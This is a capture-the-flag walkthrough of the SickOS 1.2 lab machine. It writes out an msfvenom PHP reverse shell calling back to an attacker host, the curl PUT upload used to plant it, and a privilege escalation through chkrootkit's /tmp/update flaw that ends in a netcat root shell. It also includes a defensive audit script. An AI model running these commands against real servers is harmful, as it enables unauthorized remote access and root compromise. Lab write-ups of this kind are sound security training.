SICKOS 1.2 – CTF

This is my walk-through of the SickOS 1.2 challenge posted on vulnhub.com. All testing on this image was performed in an isolated lab environment. Understand that using the tools demonstrated in this walk-through against a host without permission is against the law. Be smart folks, and enjoy the walk-through.

Full NMAP scan of host:

root@kali:~# nmap -p- -A 192.168.1.224

The NMAP scan shows ports 22 and 80 open. A quick check on port 80 with my browser:

I ran Nikto and did not come up with anything useful. I then ran Dirb to see if I could find additional directories:

root@kali:~# dirb http://192.168.1.224

Found a /test/ directory. Checked with browser but the directory is empty:

Checked for Lighttpd vulnerabilities but did not find anything for the version in use. Used cURL to check available HTTP methods for the /test/ directory:

root@kali:~# curl -v -X OPTIONS http://192.168.1.224/test/

I see that PUT is allowed for this directory, so I decide to try to upload a reverse shell. I create a PHP reverse shell using msfvenom.

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.207 LPORT=443 -f raw > sickos.php

I attempted to upload the file, but kept getting an Expectation Failed message:

Did some Google searching and figured out I needed to use the -0 option to force cURL to use HTTP version 1.0 instead of the default 1.1. With HTTP/1.1, cURL adds an Expect: 100-continue header to uploads and this server rejects it with 417 Expectation Failed; HTTP/1.0 has no Expect mechanism, so the header is simply not sent:

root@kali:~# curl -v -T sickos.php --url http://192.168.1.224/test/ -0

Configured MSF to catch my reverse shell:

Executed payload with cURL and caught the shell with MSF:

root@kali:~# curl http://192.168.1.224/test/sickos.php

With my low-privilege shell I do some enumeration:

Found a vulnerable version of Chkrootkit running in cron.daily:

www-data@ubuntu:/$ ls -al /etc/cron*

www-data@ubuntu:/$ chkrootkit -V

Checking the local Exploit DB:

root@kali:~# searchsploit chkrootkit

To summarize the vulnerability: chkrootkit versions prior to 0.50 will run any executable named /tmp/update, and since chkrootkit itself runs as root from cron.daily here, that file runs as root. Here is a link with more info: https://www.exploit-db.com/exploits/38775/
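As an added host-audit example (not part of the original walkthrough), the POSIX shell script below checks a host for the three conditions this privilege escalation relies on: a chkrootkit older than 0.50, chkrootkit scheduled from a cron directory (so it runs as root), and an executable update file already present in /tmp. Function names and the directory parameters are my own; the version check assumes the usual "major.minor" format printed by chkrootkit -V.

```shell
#!/bin/sh
# Constructed host-audit helper, not from the walkthrough: flags the conditions
# behind the chkrootkit /tmp/update issue (fixed in 0.50) on the local host.

# parse_chkrootkit_version "chkrootkit version 0.49" -> prints "0.49"
parse_chkrootkit_version() {
    printf '%s\n' "$1" | sed -n 's/.*version[[:space:]]*\([0-9][0-9.a-z]*\).*/\1/p'
}
# chkrootkit_vulnerable VERSION -> exit 0 when VERSION < 0.50, 1 otherwise
chkrootkit_vulnerable() {
    case "$1" in *.*) ;; *) return 2 ;; esac          # need "major.minor"
    major=${1%%.*}
    minor=${1#*.}
    minor=${minor%%.*}
    minor=$(printf '%s' "$minor" | sed 's/[^0-9].*//')  # "49a" -> "49"
    [ "$major" -eq 0 ] && [ "${minor:-0}" -lt 50 ]
}
# cron_runs_chkrootkit CRONDIR -> exit 0 if any file under CRONDIR mentions it
cron_runs_chkrootkit() {
    grep -rqs 'chkrootkit' "$1"
}
# tmp_update_present TMPDIR -> exit 0 if TMPDIR/update exists and is executable
tmp_update_present() {
    [ -x "$1/update" ]
}
# audit_host CRONDIR TMPDIR -> prints findings; exit 0 only if nothing was flagged
audit_host() {
    findings=0
    if command -v chkrootkit >/dev/null 2>&1; then
        ver=$(parse_chkrootkit_version "$(chkrootkit -V 2>&1)")
        if chkrootkit_vulnerable "$ver"; then
            echo "WARN chkrootkit $ver < 0.50: executes $2/update if present"
            findings=$((findings + 1))
        fi
        if cron_runs_chkrootkit "$1"; then
            echo "WARN chkrootkit is scheduled from $1 and will run as root"
            findings=$((findings + 1))
        fi
    fi
    if tmp_update_present "$2"; then
        echo "WARN executable $2/update present: inspect and remove it"
        findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}

# Run against the live host (cron.daily is where the walkthrough found it).
if audit_host /etc/cron.daily /tmp; then echo "OK: no chkrootkit findings"; fi
```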

I create a bash script and name it update:

I copy the script using my existing meterpreter session:

Once I copy the script over I change the permissions to make it executable:

I start up a nc listener and in a few minutes I have my shell:

root@kali:~# nc -nlvp 8080

And with root privileges I am able to access the proof file:

cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

Hope this was helpful!
